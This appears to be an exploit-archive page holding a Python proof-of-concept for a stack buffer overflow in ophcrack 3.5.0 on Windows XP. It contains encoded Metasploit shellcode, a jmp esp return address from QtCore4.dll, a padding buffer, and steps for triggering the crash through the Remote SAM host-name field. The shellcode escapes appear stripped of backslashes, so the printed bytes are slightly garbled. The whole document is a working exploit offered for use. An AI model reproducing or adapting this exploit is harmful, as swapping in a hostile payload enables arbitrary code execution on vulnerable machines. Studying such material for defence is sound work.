Home / exploits Ophcrack 3.50 Buffer Overflow / Code Execution
Posted on 22 May 2013
# Exploit Title: ophcrack v3.5.0 - Local Code Execution BOF # Date: 21.05.2013 # Exploit Author: xis_one@STM Solutions # Vendor Homepage: http://ophcrack.sourceforge.net/ # Software Link: http://downloads.sourceforge.net/ophcrack/ophcrack-#win32-installer-3.5.0.exe # Version: 3.5.0 # Tested on: Windows XP SP3 Eng (32bits) #!/usr/bin/python #Stack based buffer overflow - direct EIP overwrite in this case (SEH based exploitation is possible as well) #In order to exploit go to: Load -> Remote SAM -> put the content of buffer.txt file generated by this exploit into the "Host name:" field -> "Don't send" once you see the crash. #pwdump6_setup.exe will be run by ophrack.It will nicely crash and execute the payload. #pwdump6_setup itself doesn't look to be exploitable outside of ophrack. #Kudos to Hostess for pointing me to #http://www.mattandreko.com/2013/04/buffer-overflow-in-hexchat-294.html shellcode = ( #windows/exec EXITFUNC=seh CMD=calc R | msfencode -e x86/alpha_mixed bufferregister=esp -t c "x54x59x49x49x49x49x49x49x49x49x49x49x49x49x49" "x49x49x49x37x51x5ax6ax41x58x50x30x41x30x41x6b" "x41x41x51x32x41x42x32x42x42x30x42x42x41x42x58" "x50x38x41x42x75x4ax49x69x6cx79x78x6cx49x57x70" "x65x50x65x50x75x30x6ex69x7ax45x44x71x7ax72x75" "x34x4ex6bx46x32x30x30x4ex6bx56x32x34x4cx4ex6b" "x36x32x54x54x4ex6bx73x42x71x38x36x6fx48x37x32" "x6ax36x46x75x61x69x6fx34x71x49x50x6ex4cx55x6c" "x30x61x61x6cx45x52x44x6cx57x50x6fx31x78x4fx56" "x6dx47x71x69x57x7ax42x6ax50x31x42x46x37x4ex6b" "x71x42x66x70x6ex6bx43x72x35x6cx66x61x58x50x6e" "x6bx37x30x54x38x6ex65x6fx30x31x64x53x7ax56x61" "x4ex30x66x30x6ex6bx50x48x65x48x4ex6bx30x58x65" "x70x46x61x7ax73x6ax43x35x6cx43x79x6ex6bx46x54" "x6ex6bx75x51x7ax76x75x61x49x6fx66x51x6bx70x4c" "x6cx49x51x68x4fx66x6dx77x71x48x47x44x78x6bx50" "x62x55x7ax54x34x43x61x6dx4ax58x67x4bx53x4dx66" "x44x71x65x49x72x72x78x6ex6bx73x68x44x64x53x31" "x5ax73x43x56x6ex6bx54x4cx30x4bx4ex6bx73x68x35" "x4cx56x61x4bx63x4cx4bx66x64x6cx4bx46x61x58x50" "x4fx79x32x64x56x44x54x64x73x6bx63x6bx65x31x31" "x49x72x7ax62x71x49x6fx69x70x62x78x31x4fx30x5a" "x6cx4bx44x52x5ax4bx4bx36x51x4dx53x5ax67x71x6c" "x4dx4bx35x78x39x75x50x35x50x45x50x42x70x30x68" "x35x61x6ex6bx42x4fx4dx57x79x6fx69x45x4dx6bx6b" "x4ex66x6ex54x72x59x7ax43x58x59x36x4dx45x6dx6d" "x4fx6dx39x6fx5ax75x75x6cx34x46x73x4cx57x7ax6d" "x50x4bx4bx49x70x61x65x44x45x4fx4bx61x57x74x53" "x32x52x52x4fx31x7ax43x30x36x33x39x6fx49x45x50" "x63x65x31x32x4cx63x53x43x30x41x41") #!mona jmp -r esp -cp ascii -> 0x6e2a2936 : jmp esp asciiprint,ascii {PAGE_EXECUTE_READ} [QtCore4.dll] jmp="x36x29x2ax6e" buffer = "A"*497 + jmp + shellcode print(buffer) file = open('exploit.txt','w') file.write(buffer) file.close()
